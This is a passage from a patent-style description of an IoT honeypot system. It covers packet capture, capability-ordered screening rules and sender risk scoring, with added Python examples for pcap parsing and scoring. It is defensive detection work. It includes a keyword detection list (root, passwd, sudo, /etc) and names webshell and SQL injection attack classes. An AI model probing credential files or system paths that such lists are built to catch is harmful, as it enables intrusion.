The target internet of things protocol may be any protocol used in the internet of things field, including but not limited to the MQTT (Message Queue Telemetry Transport) protocol.
The server-side induction device of the third attack induction subsystem may be a server deployed based on the MQTT protocol, and the induction server is an MQTT server (see the MQTT server in the high-interaction honeypot in fig. 2c).
The target intranet of this embodiment is not limited and may be a laboratory intranet, and the induction client devices of the third attack induction subsystem in this embodiment may include a plurality of MQTT clients.
In this embodiment, the application (e.g., device firmware) that the internet of things protocol client device itself runs may be run in a simulator, such as the QEMU simulator, to simulate the running of the device and thereby simulate the device itself.
202. Determining the screening order and screening rules of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
In this embodiment, before step 201, the data on the induction server may be monitored. The monitoring manner includes, but is not limited to, running a monitoring command such as a tcpdump command on the induction server to capture the data on a monitored port of the induction server and store the captured access data packets in a pcap file on the induction server. The storage frequency is not limited; for example, it may be once per hour, that is, the access data packets are collected once per hour and stored in the pcap file. The pcap file may be stored in the cloud database corresponding to the induction server.
In step 201, a pcap file may be obtained from a cloud database to extract an access data packet in the pcap file.
In this embodiment, the attack induction capabilities of different attack induction subsystems are affected by the honeypot type of the attack induction subsystem, the induction client devices it includes, and the like.
In one example, all the attack induction subsystems may be considered to have the same attack induction capability, and their screening order and screening rules may be the same; that is, the same screening rule may be used to screen the access data packets of all attack induction subsystems for attack data packets at the same time. In this example, the access data packets from multiple induction servers may be stored together in one pcap file.
In one example, the actual attack induction capability of each attack induction subsystem may be determined in a certain manner, and different screening orders then adopted to screen for attack data packets. In this example, the pcap file may include a plurality of subfiles, each storing the access data packets of one induction server.
In one example, after the server of the system where the security management device for accessing data is located obtains the access data packet from the pcap file, the server may analyze the access data packet to obtain an analysis data packet, and store the analysis data packet in the database, so as to be used in the subsequent screening of the attack data packet.
When the access data packet is analyzed, the access data packet can be split according to the data type to obtain an analysis data packet.
The access data packet can be split according to contents such as IP address, port, access time and payload, and then stored in a database for malicious traffic analysis (i.e., attack data packet analysis).
Optionally, the number and content of the screening rules of different attack induction subsystems may be different. A screening rule is a rule for determining an attack data packet; neither the screening dimension of a screening rule nor the number of screening rules is limited.
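As an added example (not code from the patent), the monitoring and parsing step above: a small parser that reads a tcpdump-style pcap file captured on the induction server, splits each TCP access packet into source IP, port, access time and payload, and stores the parsed data packets in a database. The capture is constructed inline, and sqlite3 stands in for the cloud database (both assumptions).

```python
"""Extract access packets from a pcap file captured on an induction server and
split each one into a parsed data packet (IP address, port, access time, payload).
Added example; the capture is constructed and sqlite3 stands in for the cloud database."""
import socket
import sqlite3
import struct
from datetime import datetime, timezone

PCAP_MAGIC_LE = 0xA1B2C3D4    # libpcap magic number, little-endian, microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_sample_pcap(records):
    """Constructed little-endian pcap file; records are (ts_sec, ts_usec, frame)."""
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    body = b"".join(
        struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)) + frame
        for ts_sec, ts_usec, frame in records
    )
    return header + body


def build_tcp_frame(src_ip, dst_ip, src_port, dst_port, payload):
    """Constructed Ethernet/IPv4/TCP frame. Checksums are left zero; the parser never checks them."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def parse_frame(frame):
    """Split one Ethernet frame into the stored fields; None for frames that are not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None                                    # not IPv4 (e.g. ARP)
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:
        return None                                    # not TCP (http, ssh, telnet, mqtt all ride on TCP)
    total_len = struct.unpack_from("!H", frame, 16)[0]
    tcp_off = 14 + ihl
    if len(frame) < tcp_off + 20:
        return None
    src_port, dst_port = struct.unpack_from("!HH", frame, tcp_off)
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return {
        "src_ip": socket.inet_ntoa(frame[26:30]),
        "dst_ip": socket.inet_ntoa(frame[30:34]),
        "src_port": src_port,
        "dst_port": dst_port,
        "payload": frame[tcp_off + data_off:14 + total_len],
    }


def parse_pcap(data):
    """Walk the record headers of a pcap file and return the parsed data packets."""
    magic, = struct.unpack_from("<I", data, 0)
    linktype, = struct.unpack_from("<I", data, 20)
    if magic != PCAP_MAGIC_LE or linktype != LINKTYPE_ETHERNET:
        raise ValueError("this example supports little-endian microsecond pcap over Ethernet only")
    parsed, off = [], 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        record = parse_frame(data[off:off + incl_len])
        off += incl_len
        if record is not None:
            record["access_time"] = datetime.fromtimestamp(
                ts_sec + ts_usec / 1_000_000, tz=timezone.utc).isoformat()
            parsed.append(record)
    return parsed


def store_parsed_packets(conn, records):
    """Store the parsed packets for later screening; returns the row count."""
    conn.execute("CREATE TABLE IF NOT EXISTS parsed_packets ("
                 "src_ip TEXT, src_port INTEGER, dst_ip TEXT, dst_port INTEGER, "
                 "access_time TEXT, payload BLOB)")
    conn.executemany("INSERT INTO parsed_packets VALUES (?, ?, ?, ?, ?, ?)",
                     [(r["src_ip"], r["src_port"], r["dst_ip"], r["dst_port"],
                       r["access_time"], r["payload"]) for r in records])
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM parsed_packets").fetchone()[0]


# Constructed one-hour capture: a telnet login attempt against the simulated camera (port 23),
# an HTTP request to the simulated router (port 80), and an ARP frame the parser must skip.
SAMPLE_PCAP = build_sample_pcap([
    (1609459200, 250000, build_tcp_frame("203.0.113.7", "198.51.100.10", 40111, 23, b"root\r\n")),
    (1609459201, 0, b"\xff" * 6 + b"\x00" * 6 + b"\x08\x06" + b"\x00" * 28),
    (1609459202, 500000, build_tcp_frame("203.0.113.8", "198.51.100.10", 40112, 80,
                                         b"GET /admin HTTP/1.1\r\n\r\n")),
])


def load_sample(conn=None):
    """Parse the constructed capture and store it; returns (parsed packets, stored row count)."""
    conn = conn or sqlite3.connect(":memory:")
    records = parse_pcap(SAMPLE_PCAP)
    return records, store_parsed_packets(conn, records)


if __name__ == "__main__":
    for rec in load_sample()[0]:
        print(rec["access_time"], rec["src_ip"], rec["dst_port"], rec["payload"])
```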
203. Determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;
Wherein the currently screened attack induction subsystems are, among the attack induction subsystems that have not yet been screened, those that rank first in the screening order.
It is to be understood that the number of currently screened attack-inducing subsystems may be at least one.
204. If the currently screened attack induction subsystems rank first in the screening order, determining attack data packets in the access data packets based on the screening rules corresponding to the currently screened attack induction subsystems and the access data packets received by the currently screened attack induction subsystems;
In the example where the attack induction capabilities of the attack induction subsystems are considered to be the same, the currently screened attack induction subsystems are all of the attack induction subsystems, and referring to fig. 2d, the analysis of attack data packets can be roughly divided into four steps: data screening, logic detection, fuzzy matching and precise matching.
Optionally, in an example, the step "determining attack data packets in the access data packets based on the screening rules corresponding to the currently screened attack induction subsystems and the access data packets received by the currently screened attack induction subsystems" may include:
acquiring the parsed data packets corresponding to the access data packets received by all the attack induction subsystems;
acquiring access behavior characteristic information corresponding to each parsed data packet based on the data of the parsed data packet, and determining suspicious parsed data packets among the parsed data packets based on the access behavior characteristic information and the screening rules of the access behavior dimension;
and performing attack feature matching on the suspicious parsed data packets based on the attack feature information of attack data packets preset in the screening rules, and determining the attack data packets in the access data packets based on the matching result.
The access behavior characteristic information may include the type of protocol used and the access characteristics of the accessing party.
Optionally, the parsed data packets may be obtained from the database. The screening rules may include protocol types preset for suspicious parsed data packets and access characteristics of the accessing party; one protocol type may be regarded as one screening rule, and one access characteristic may also be regarded as one screening rule.
Wherein the data screening step is carried out based on the protocol type, and the logic detection step is carried out based on the access characteristics.
Optionally, the step "acquiring access behavior characteristic information corresponding to each parsed data packet based on the data of the parsed data packet, and determining suspicious parsed data packets among the parsed data packets based on the access behavior characteristic information and the screening rules of the access behavior dimension" may include:
acquiring the protocol used by the parsed data packet based on the data of the parsed data packet;
acquiring the access characteristics of the sending user of the parsed data packet based on the data of the parsed data packet;
and if the protocol of the parsed data packet is a preset protocol in the screening rules and/or the corresponding access characteristics conform to the specific access characteristics of a suspicious user preset in the screening rules, determining that the parsed data packet is a suspicious parsed data packet.
The preset protocol may be set as required; for example, the preset protocols include but are not limited to TCP, SSH, SIP, HTTP, MQTT, SOAP, and the like.
The access characteristics may include, among other things, the geographic location and host address of the terminal (host) used by the visitor, the access duration, the number of accesses, the port(s) of the induction server to which connection was attempted, and the like, as related to the visitor's access to the induction server. For each access characteristic, a specific access characteristic corresponding to a suspicious user may be set; for example, a suspicious user is a user whose number of accesses is not lower than 100, and the like.
Wherein the order of the data screening and logic detection steps is not limited.
Optionally, in this embodiment, the screening rules may include screening rules set from the keyword dimension, where a keyword is understood as a keyword that may occur in an attack data packet and may be set manually. After the suspicious parsed data packets are determined, more accurate matching can be performed based on the screening rules, and the step of performing attack feature matching on the suspicious parsed data packets based on the attack feature information of attack data packets preset in the screening rules, and determining the attack data packets in the access data packets based on the matching result, may include:
performing keyword matching on the suspicious parsed data packets based on the attack data packet keywords preset in the screening rules;
determining the successfully matched suspicious parsed data packets as highly suspicious parsed data packets;
and determining the attack data packets in the access data packets based on the highly suspicious parsed data packets.
The attack data packet keywords may be keywords with a high occurrence frequency counted statistically from historical attack data packets, or keywords related to sensitive operations such as user permissions or protocol modification. Optionally, the keywords include but are not limited to: root, passwd, password, su, sudo, admin, /etc. If a keyword is detected in the payload of a parsed data packet, that packet is a highly suspicious parsed data packet.
Optionally, the screening rules may further include screening rules set from the network attack dimension; screening rules of this kind contain attack features related to network attacks.
Optionally, the network attacks include, but are not limited to, vulnerability attacks, attacks against internet of things protocols, and attacks performed using some general network attack methods; correspondingly, the screening rules may include the vulnerability features of preset vulnerabilities, attack features against internet of things protocols, attack features of preset network attack methods, and the like.
Optionally, the step of determining the attack data packets in the access data packets based on the highly suspicious parsed data packets may include:
if the payload of a highly suspicious parsed data packet contains the vulnerability features of a preset vulnerability in the screening rules; or the content of the highly suspicious parsed data packet associated with an internet of things protocol has the attack features set in the screening rules for that internet of things protocol; or the data of the highly suspicious parsed data packet has the attack features of a preset network attack method set in the screening rules;
determining the access data packet corresponding to the highly suspicious parsed data packet as an attack data packet.
The preset vulnerability may be any existing vulnerability, and the internet of things protocols include but are not limited to MQTT, SOAP and related protocols.
In this embodiment, for an attack induction subsystem having a real device (i.e., an entity client device), a screening rule based on the detection dimension of specific operation pages of the real device may further be set; in this type of screening rule, data of the specific operation pages of the real device that may be contained in an attack data packet is set. The type and content of a specific operation page are not limited; it may be, for example, a management page, a user page or a data download page of the real device. A specific operation page is a user operation page that is not exposed when the entity client device of this embodiment is exposed in the public network. For example, when the entity client device is exposed in the public network, only the data of the login page is exposed; a user can only reach the login page by accessing the attack induction subsystem through the public network, and can enter other operation pages such as the management page only after logging in to the entity client device with account information.
If an access data packet of a user contains data of any specific operation page and was sent without the user having logged in to the entity client device, the access data packet may be determined as an attack data packet.
Optionally, this embodiment further includes: if a highly suspicious parsed data packet contains information of the entity client device that is not exposed to the public network, the access data packet corresponding to that highly suspicious parsed data packet may also be regarded as an attack data packet. The information not exposed to the public network may include the specific operation pages of the entity client device.
In this embodiment, the preset network attack methods include, but are not limited to, general attack methods such as webshell attacks and SQL (Structured Query Language) injection attacks.
In another example, the attack induction capability of an attack induction subsystem is related to the honeypot technology it uses and to the type, number and disguised services of the induction client devices it comprises. Generally, the more complex the honeypot technology, the larger the number of induction client devices, the richer their types and the more disguised services there are, the stronger the attack induction capability. The stronger the attack induction capability, the earlier the subsystem is placed in the screening order.
In this example, the screening orders of the attack induction subsystems are not all the same and may be determined according to the attack induction capability of each subsystem for attack data packets. In one example, the step of determining the screening order of the attack induction subsystems based on their attack induction capabilities may be performed when a subsystem of the attack induction system changes, for example when its disguised services change or its induction client devices change (including deletion, addition and the like). When no attack induction subsystem has changed, the screening order need not be updated.
In this embodiment, different types of attack induction subsystems differ in the time required for deployment or in how readily the deployment is updated. For example, an attack induction subsystem deployed with low-interaction honeypot technology has a short deployment time, can be completed quickly, and can by itself reach a high level of attack induction capability in a short time.
In this embodiment, the deployment of an attack induction subsystem implemented with a high-interaction honeypot may be scheduled over a longer period: some basic server-side devices such as the induction server and a few induction client devices may be deployed first, and the structure of the subsystem is then expanded step by step to add induction client devices, which reduces the high deployment cost that a complex attack induction subsystem would otherwise require within a short time. As the attack induction subsystem is completed, its attack induction capability increases gradually.
In this embodiment, the relative strength of the attack induction capabilities of different attack induction subsystems may change. A stronger attack induction capability means that the subsystem receives more attack data packets, and one attacking user may attack several attack induction subsystems at the same time. The embodiment therefore screens attack data packets first on the attack induction subsystem with the strongest attack induction capability, and then screens the subsystems that come later on the basis of that screening result. This avoids matching the access data packets of every attack induction subsystem against the corresponding screening rules and helps reduce the resources required for screening.
The attack induction capability of an attack induction subsystem may be determined periodically at a fixed time interval, or it may be determined when a change (a structural change, a change of disguised services, or the like) in a particular attack induction subsystem is detected.
After each determination, the determined attack induction capability may be converted into identification information, such as a numerical value, that reflects the strength of the attack induction capability, and the old identification information of the subsystem is replaced with the newly determined one. In the steps above, the identification information of an attack induction subsystem may be read and the screening order of its attack data packets determined from it. In one example, different attack induction subsystems may share one set of screening rules, or their screening rules may differ and be stored separately as configured by the user. Optionally, a correspondence between the screening rule of an attack induction subsystem and its identification information may be established, so that the screening order and the screening rule are determined together from the identification information.
Optionally, the attack induction capability of an attack induction subsystem may be determined from the honeypot technology the subsystem uses, the number of induction servers and induction client devices it contains, its disguised services, and the like. Optionally, different induction servers and induction client devices may be assigned corresponding scores, and the same kind of induction server may be assigned different scores according to factors such as its size; for example, the larger the induction server (the more computing resources it has), the higher its score. Different honeypot technologies may be assigned corresponding score weights; the scores are summed, the sum is weighted with the score weight, and the resulting total score is used as the identification information of the attack induction capability of the subsystem.
The more complex the honeypot technology, the higher the score weight.
It can be understood that just after the attack induction system is deployed, low-interaction honeypot technology is simple and fast to deploy, so the number of induction client devices and the like in the subsystem deployed with it is likely to be far greater than in the other attack induction subsystems, and its attack induction capability is likely to be the highest. As time goes on, other attack induction subsystems are gradually completed, their attack induction capability grows stronger, and it gradually exceeds that of the subsystem deployed with low-interaction honeypot technology.
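As an added illustration (not code from the patent), the following Python models the scoring just described: per-device scores are summed and weighted by a honeypot-technology factor to give the identification value, the value is recomputed on a change, and the screening order is read from it. All scores, weights and subsystem make-ups are constructed assumptions.

```python
"""Added example, not the patent's own code: capability identification values and screening order."""
from dataclasses import dataclass

# Constructed per-device base scores (the patent leaves concrete values to the deployer).
DEVICE_SCORES = {
    "induction_server": 10,   # multiplied by the server's relative size
    "induction_client": 2,    # per induction client device
    "entity_client": 5,       # a real (entity) client device counts more
    "masquerade_service": 3,  # per disguised service offered
}
# Constructed honeypot-technology weights: the more complex the technology, the higher the weight.
TECH_WEIGHTS = {"low_interaction": 1.0, "medium_interaction": 1.5, "high_interaction": 2.0}


@dataclass
class Subsystem:
    name: str
    technology: str
    server_size: int             # relative computing resources of the induction server
    induction_clients: int
    entity_clients: int = 0
    masquerade_services: int = 0
    capability_id: float = 0.0   # identification information; overwritten on each recompute


def capability_score(s: Subsystem) -> float:
    """Sum of device scores, weighted by the honeypot-technology factor."""
    total = (DEVICE_SCORES["induction_server"] * s.server_size
             + DEVICE_SCORES["induction_client"] * s.induction_clients
             + DEVICE_SCORES["entity_client"] * s.entity_clients
             + DEVICE_SCORES["masquerade_service"] * s.masquerade_services)
    return round(total * TECH_WEIGHTS[s.technology], 2)


def refresh_capability(subsystems):
    """Recompute (on a timer or after a detected change) and replace the old identification
    information with the new one. Returns the names whose value changed."""
    changed = []
    for s in subsystems:
        new = capability_score(s)
        if new != s.capability_id:
            s.capability_id = new
            changed.append(s.name)
    return changed


def screening_order(subsystems, two_tier=False):
    """Strongest capability first. With two_tier=True the order has only two positions:
    the strongest subsystem, then all remaining subsystems as one parallel group."""
    ranked = sorted(subsystems, key=lambda s: s.capability_id, reverse=True)
    if two_tier:
        return [[ranked[0].name], [s.name for s in ranked[1:]]]
    return [[s.name] for s in ranked]


def initial_subsystems():
    """Constructed state just after deployment: A (high interaction) is still small,
    B (low interaction) already has many induction clients."""
    return [Subsystem("A", "high_interaction", 2, 2, entity_clients=1, masquerade_services=2),
            Subsystem("B", "low_interaction", 1, 40, masquerade_services=5),
            Subsystem("C", "medium_interaction", 1, 10, masquerade_services=3)]


def grow_subsystem(s: Subsystem, extra_clients: int, extra_services: int):
    """Structural change: the subsystem is built out further."""
    s.induction_clients += extra_clients
    s.masquerade_services += extra_services


if __name__ == "__main__":
    subs = initial_subsystems()
    refresh_capability(subs)
    print(screening_order(subs))                 # B leads while A is still being built out
    grow_subsystem(subs[0], 28, 8)               # A is completed over time
    print(refresh_capability(subs), screening_order(subs, two_tier=True))
```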
In an example, the screening rule may also be updated along with the attack induction subsystem. Optionally, the embodiment further includes receiving a screening rule update instruction sent by a target attack induction subsystem, where the instruction contains a newly added screening rule; parsing the newly added screening rule from the instruction; storing it; and establishing a correspondence between the newly added screening rule and the identification information of the attack induction capability of the target attack induction subsystem.
205. If the currently screened attack induction subsystem is not first in the screening order, obtaining the sending users of the attack data packets already screened out, based on the screening results of the attack induction subsystems screened earlier; determining, among the access data packets received by the currently screened attack induction subsystem, those sent by these sending users as attack data packets; and determining the attack data packets among the unscreened access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and its unscreened access data packets;
If the currently screened attack induction subsystem is not the first in the screening order, then in the step of determining the sending users of the attack data packets based on the screening results of the attack induction subsystems that precede it in the screening order, the determined sending users may be those of the attack data packets of all attack induction subsystems that precede the currently screened one in the screening order.
That is, suppose there are three attack induction subsystems A, B and C, with screening order A, C, B. A is screened first according to its screening rule; after A has been screened, the sending users of A's attack data packets (called first sending users for distinction) are determined from the screening result. When the access data packets of C are screened, the access data packets sent by the first sending users are screened out first as attack data packets, then the remaining access data packets are screened according to the corresponding screening rule, and the sending users of the attack data packets screened out of the remaining packets (called second sending users for distinction) are determined. When the access data packets of B are screened, the access data packets sent by the first and second sending users are screened out as attack data packets, and the remaining access data packets are then screened according to the corresponding screening rule.
Alternatively, in the step of determining the sending users of the attack data packets based on the screening results of the attack induction subsystems that precede the currently screened one in the screening order, the determined sending users may include the sending users of the attack data packets of the attack induction subsystem that is first in the screening order.
When the number of attack induction subsystems is large and they are screened one after another in the screening order, the screening may take a long time. Considering that current cloud servers and the like have strong parallel processing capacity and can process a large amount of data in a short time, this characteristic can be exploited to shorten the screening time and process attack data packets as soon as possible.
Optionally, in one example, when the currently screened attack induction subsystem is determined based on the screening order of each attack induction subsystem, the screening order contains only two positions: the first position holds the attack induction subsystem with the strongest attack induction capability, and the second position holds all the remaining attack induction subsystems.
In this example, after the attack data packets have been screened out of the access data packets of the subsystem with the strongest attack induction capability, the attack data packets may be screened out of the access data packets of all remaining subsystems simultaneously.
In this example, the order in which the access data packets of different attack induction subsystems are parsed need not follow the screening order: the access data packets of all subsystems may be parsed to obtain the corresponding analysis data packets before any attack data packet is screened, and screening is then carried out according to the screening order and the screening rules.
In another example, a packet may be parsed only when an attack data packet needs to be screened from it.
Optionally, the step "determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack inducing subsystem and the access data packet received by the currently screened attack inducing subsystem" may include:
obtaining the corresponding analysis data packet for each access data packet received by the currently screened attack induction subsystem;
obtaining access behavior characteristic information corresponding to the analysis data packet, and determining the suspicious analysis data packets among the analysis data packets based on the access behavior characteristic information;
and performing feature matching on the suspicious analysis data packets based on the attack feature information of attack data packets preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packets among the access data packets based on the matching result.
For the specific steps of parsing the access data packet, the concepts of access behavior characteristic information and attack characteristic information, and the process of determining which data packets can be parsed, reference may be made to the description in the foregoing example, which is not repeated here.
Optionally, the step of "obtaining access behavior feature information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior feature information" may include:
obtaining the protocol used by the analysis data packet based on its data;
obtaining the access characteristics of the sending user of the analysis data packet based on its data;
and if the protocol used by the analysis data packet is a preset protocol in the screening rule corresponding to the currently screened attack induction subsystem and/or the access characteristics match the specific access characteristics of a suspicious user preset in that screening rule, determining the analysis data packet to be a suspicious analysis data packet.
For the explanation of the preset protocol and the specific access characteristics, refer to the description in the foregoing examples; details are not repeated here.
In one example, performing feature matching on the suspicious analysis data packets based on the attack feature information of attack data packets preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packets among the access data packets based on the matching result, may specifically include: performing keyword matching on the suspicious analysis data packets based on the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem; determining the successfully matched suspicious analysis data packets to be highly suspicious analysis data packets; and determining the attack data packets among the access data packets based on the highly suspicious analysis data packets.
For the explanation of the preset attack data packet keywords, refer to the description in the foregoing example; details are not repeated here.
Optionally, the step of determining an attack data packet among the access data packets based on the highly suspicious analysis data packet may include:
if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics for the internet of things protocol in that screening rule; and/or the data of the highly suspicious analysis data packet has the attack characteristics of a preset attack network method in that screening rule;
determining the access data packet corresponding to the highly suspicious analysis data packet as an attack data packet.
For the vulnerability characteristics of a preset vulnerability, the attack characteristics for the internet of things protocol, the attack characteristics of a preset attack network method, and the like, reference may be made to the description in the foregoing example, which is not repeated here.
If the currently screened attack induction subsystem is not the first in the screening order, the step of determining the attack data packets among its unscreened access data packets based on its screening rule uses the same screening scheme as the first attack induction subsystem in the screening order, with two substitutions: the access data packets being screened are the unscreened access data packets of the currently screened attack induction subsystem, and the screening rule is that of the currently screened attack induction subsystem. The other screening steps are identical and are not repeated here.
206. Processing the attack data packet based on the determined attack risk that the attack data packet poses to the attack induction system.
In one example, the attack risk of the attack data packet may be determined based on data of a single attack data packet, for example, the attack risk may be determined based on parameters such as a screening rule hit by the attack data packet.
In another example, the determining of the attack risk may be performed on all attack data packets of the same sending user, and optionally, the processing of the attack data packets based on the determined attack risk of the attack data packets on the attack guidance system may include:
determining, according to the sending user information of the attack data packets, the attack data packets of the same sending user across all attack induction subsystems as the user-associated attack data packets of that sending user;
determining the attack risk of the user-associated attack data packets of the same sending user according to the number of those packets, the number and attack induction capabilities of the attack induction subsystems they attacked, and the screening rules they hit;
and processing the user-associated attack data packets of the same sending user in the processing mode corresponding to their attack risk.
The number of user-associated attack data packets may be converted into a risk score (the larger the number, the higher the risk score); each attack induction subsystem may be given a corresponding risk score; each screening rule may also be given a corresponding risk score; the identification information corresponding to the attack induction capability may be converted into a corresponding risk score; and the attack risk of the user-associated attack data packets of the same sending user may be represented by the sum of the risk scores of all of them.
A risk score threshold may be set. If the attack risk is higher than the risk score threshold, the processing mode for the attack data packets is isolated storage, and the attack data packets stored in the system where the attack induction system and the security management device for access data are located are deleted; the storage device used for isolated storage is a non-networked device.
Attack data packets whose risk is not above the risk score threshold may be stored in an attack data packet database for later use.
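The per-sender aggregation and the two processing modes, as an added Python example rather than the patent's own code; the per-rule and per-subsystem risk tables, the threshold, the score functions and the sample packets are constructed assumptions. The same four-part sum is the one carried out in steps 313 to 315 of the refined embodiment later on this page.

```python
"""Added example, not the patent's own code: risk of all attack packets of one sending user."""
from collections import defaultdict

RISK_THRESHOLD = 50  # constructed

# Constructed risk score per screening rule hit ("known_sender" = flagged because an earlier
# subsystem already identified this sender as an attacker).
RULE_RISK = {"vuln_features": 20, "iot_features": 15, "attack_methods": 10, "known_sender": 5}
# Constructed risk score per subsystem, converted from its capability identification value.
SUBSYSTEM_RISK = {"A": 15, "B": 5, "C": 8}


def count_risk(n_packets: int) -> int:
    """First score: more packets from one sender, higher risk (capped)."""
    return min(2 * n_packets, 30)


def breadth_risk(n_subsystems: int) -> int:
    """Fourth score: how many subsystems the same sender attacked."""
    return {1: 0, 2: 10}.get(n_subsystems, 20)


def assess_senders(attack_packets):
    """Group attack packets by sending user and compute the four risk scores, their sum,
    and the processing mode chosen by comparing the sum with the threshold."""
    by_sender = defaultdict(list)
    for p in attack_packets:
        by_sender[p["sender"]].append(p)
    assessments = {}
    for sender, pkts in by_sender.items():
        subsystems = {p["subsystem"] for p in pkts}
        scores = {
            "first": count_risk(len(pkts)),
            "second": sum(RULE_RISK[p["rule"]] for p in pkts),      # rules hit
            "third": sum(SUBSYSTEM_RISK[s] for s in subsystems),    # capability of subsystems hit
            "fourth": breadth_risk(len(subsystems)),
        }
        total = sum(scores.values())
        scores["total"] = total
        scores["action"] = "isolate" if total > RISK_THRESHOLD else "archive"
        assessments[sender] = scores
    return assessments


def dispose(attack_packets, assessments, induction_store, isolated_store, attack_db):
    """Apply the processing mode: 'isolate' copies the packet to the offline (non-networked)
    store and purges it from the induction system's storage; 'archive' keeps it in the
    attack packet database for later analysis."""
    for p in attack_packets:
        if assessments[p["sender"]]["action"] == "isolate":
            isolated_store.append(p)
            induction_store[:] = [q for q in induction_store if q is not p]
        else:
            attack_db.append(p)


# Constructed attack packets as produced by the screening step (documentation addresses).
SAMPLE_ATTACK_PACKETS = [
    {"sender": "203.0.113.7", "subsystem": "A", "rule": "attack_methods"},
    {"sender": "203.0.113.7", "subsystem": "B", "rule": "known_sender"},
    {"sender": "203.0.113.7", "subsystem": "A", "rule": "vuln_features"},
    {"sender": "198.51.100.9", "subsystem": "C", "rule": "iot_features"},
]

if __name__ == "__main__":
    result = assess_senders(SAMPLE_ATTACK_PACKETS)
    for sender, scores in result.items():
        print(sender, scores)
    store, isolated, db = list(SAMPLE_ATTACK_PACKETS), [], []
    dispose(SAMPLE_ATTACK_PACKETS, result, store, isolated, db)
    print(len(store), "left in induction system;", len(isolated), "isolated;", len(db), "archived")
```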
Optionally, the embodiment may further perform statistical analysis on the attack data packets and generate a statistical report for users to view. Optionally, the method of this embodiment may further include: analyzing the data in the attack data packets and obtaining statistical information on the attack data packets in at least one abnormal traffic statistical dimension; and generating an abnormal traffic statistical report based on the statistical information.
The abnormal traffic statistical dimensions include, but are not limited to:
1. attacker IP;
2. attacker geographic location;
3. attack port;
4. attack date;
5. attack times;
6. protocol used by the attack;
7. attack data payload;
8. description of the vulnerability exploited by the attack;
9. reference for the vulnerability exploited by the attack.
The vulnerability description may include the attack behavior of the attack data packet, the damage caused, the server port targeted by the attack data packet, and the like. The vulnerability reference may include the provenance of the vulnerability, such as the name of a paper and its page numbers.
In one example, after the abnormal traffic statistical report is generated based on the statistical information, the method further includes:
when an abnormal traffic viewing instruction sent by a management terminal is received, sending the abnormal traffic statistical report to the management terminal so that the management terminal can display an abnormal traffic viewing page based on the report.
Through the abnormal traffic viewing page, the management user can query and analyze the data.
By adopting this embodiment, the access data packets received by at least one induction server in the attack induction system are obtained, where the attack induction system includes at least two attack induction subsystems and each attack induction subsystem includes an induction server and at least one induction client device connected to it; the attack data packet screening scheme of each attack induction subsystem is determined according to its attack induction capability; the attack data packets among the access data packets are determined according to the screening scheme corresponding to each attack induction subsystem and the access data packets it received; and the attack data packets are processed based on the determined attack risk they pose to the attack induction system. In this way, different attack induction subsystems can attract richer attack behavior, so the induction servers in the attack induction system receive more attack data packets; the attack data packets are detected in a targeted manner through the screening scheme corresponding to each attack induction subsystem, giving a more accurate detection result, which helps discover more device vulnerabilities and improves the security of the internet of things industry.
This embodiment also provides a refined embodiment of the security management method for access data. In this example it is assumed that the attack induction system includes three attack induction subsystems: an attack induction subsystem A built with high-interaction honeypot technology, an attack induction subsystem B built with low-interaction honeypot technology, and a third attack induction subsystem C, where the second and third attack induction subsystems share one induction server.
Referring to fig. 3, the method for managing security of access data includes:
301. Sending an access data packet acquisition request to the induction servers of attack induction subsystems A to C, and receiving the access data packets sent by the induction servers in response to the request;
The access data packet acquisition request may carry the time at which access data packets were last acquired, so that the induction server sends the access data packets received after that time.
302. Acquiring the identification information of the attack induction capabilities of attack induction subsystems A to C, and determining their screening order and screening rules based on the mapping between the identification information and the screening order and screening rules;
The method of calculating the identification information is as described in the foregoing examples and is not repeated here.
In the screening order, attack induction subsystem A is first, and attack induction subsystems B and C are second, in parallel. The screening rule of attack induction subsystem A may be the same as or different from those of attack induction subsystems B and C; this embodiment is not limited in this respect.
303. Obtaining the corresponding analysis data packets (called first analysis data packets for distinction) for the access data packets received by attack induction subsystem A; obtaining the protocol used by each first analysis data packet and the access characteristics of its sending user based on its data;
304. If the protocol of a first analysis data packet is a preset protocol in the screening rule and/or the access characteristics match the specific access characteristics of a suspicious user preset in the screening rule, determining the first analysis data packet to be a suspicious analysis data packet;
305. Performing keyword matching on the suspicious analysis data packets based on the attack data packet keywords preset in the screening rule, and determining the successfully matched suspicious analysis data packets to be highly suspicious analysis data packets;
306. If the payload of a highly suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability in the screening rule; or the content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics set in the screening rule for the internet of things protocol; or the data of the highly suspicious analysis data packet has the attack characteristics of a preset attack network method set in the screening rule; determining the access data packet corresponding to that highly suspicious analysis data packet as an attack data packet of attack induction subsystem A;
307. Determining the sending users of the attack data packets of attack induction subsystem A;
308. Determining the data packets sent by those sending users among the access data packets received by attack induction subsystems B and C as attack data packets;
